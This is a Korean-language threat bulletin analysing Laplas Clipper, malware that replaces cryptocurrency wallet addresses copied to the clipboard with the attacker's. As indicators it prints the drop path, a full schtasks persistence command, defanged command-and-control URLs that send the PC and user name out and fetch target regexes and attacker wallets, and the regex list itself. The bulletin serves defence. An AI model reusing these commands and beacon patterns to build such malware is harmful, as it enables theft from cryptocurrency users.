|
클립보드 데이터를 감시하는 Laplas Clipper 분석팀 2022.11.11 |
|
|
최근, 가상화폐 사용자들을 대상으로한 악성코드인 Laplas Clipper가 새롭게 발견됐다. 해당 악성코드는 감염 시 PC의 클립보드 데이터를 실시간으로 감시해 특정 가상화폐 주소가 복사됐을 경우 공격자가 설정한 주소로 교체하는 기능을 수행한다.
Cyble의 분석에 따르면 "Laplas Clipper는 현재 Smoke Loader 를 통해 유포되고 있으며 2022년 10월 24일부터 지금까지 180개 이상의 샘플이 발견되고 있다." 고 경고했다.
Laplas Clipper는 Go 언어로 제작된 악성코드로 최초 실행 시 감염 지속성을 유지하기 위해 자기 자신을 특정 경로에 복사 및 스케줄러를 등록한다.
- Laplas Clipper 복사 경로 * C:/Users/{사용자명}/AppData/Roaming/{랜덤 문자열 10자리}/svcupdater.exe
- 스케줄러 등록 (cmd 명령어 사용) * cmd.exe /C schtasks /create /tn {랜덤 문자열 10자리} /tr "{악성코드 경로}" /st 00:00 /du 9999:59 /sc once /ri 1 /f
이후 Laplas Clipper는 특정 웹 주소로 PC의 사용자 이름, 컴퓨터 명을 전송하며 데이터 탈취에 사용될 정규 표현식, 교체할 공격자의 가상화폐 지갑주소를 수신받게 된다.
- 최초 정보 전송 * http[:]//clipper[.]guru/bot/online?guid={PC이름}{사용자 이름}&key={해쉬}
- 가상화폐 정규 표현식 데이터 수신 주소 * http[:]//clipper[.]guru/bot/regex?key={해쉬}
- 공격자 가상화폐 수신 주소 * http[:]//clipper[.]guru/bot/get?address={복사된 원본 지갑주소}&key={해쉬}
- 수신된 정규표현식 목록 * ^(?:(1[a-zA-HJ-NP-Z1-9]{25,59}) * (3[a-zA-HJ-NP-Z0-9]{25,59}) * (bc1q[a-zA-HJ-NP-Z0-9]{24,59}) * (1[a-km-zA-HJ-NP-Z1-9]{25,34}) * (3[a-km-zA-HJ-NP-Z1-9]{25,34}) * (q[a-z0-9]{41}) * (p[a-z0-9]{41}) * (L[a-km-zA-HJ-NP-Z1-9]{26,33}) * (M[a-km-zA-HJ-NP-Z1-9]{26,33}) * (3[a-km-zA-HJ-NP-Z1-9]{26,33}) * (ltc1q[a-km-zA-HJ-NP-Z1-9]{26,33}) * (0x[a-fA-F0-9]{40}) * (D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}) * (4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}) * (8[0-9AB][1-9A-HJ-NP-Za-km-z]{93}) * (r[0-9a-zA-Z]{24,34}) * (t1[a-km-zA-HJ-NP-Z1-9]{33}) * (X[1-9A-HJ-NP-Za-km-z]{33}) * (ronin:[a-fA-F0-9]{40}) * (T[A-Za-z1-9]{33}) * (http[s]*://steamcommunity.com/tradeoffer/new/?partner=([0-9]+)&token=([a-zA-Z0-9]+)) * (tz[1-3][1-9A-HJ-NP-Za-km-z]{33}) * (addr1[a-z0-9]+) * (cosmos1[a-z0-9]{38}) * ([1-9A-HJ-NP-Za-km-z]{32,44}) * ([A-Z2-7]{58}) * (R[a-zA-Z0-9]{33}))$
Laplas Cliper는 가장 최근에 출시된 악성코드인 만큼 꾸준한 업데이트가 이뤄질 것으로 보이며, 불특정 다수에게 판매되는 만큼 유표 경로가 다양해질 것으로 보고있어 주의가 필요하다. |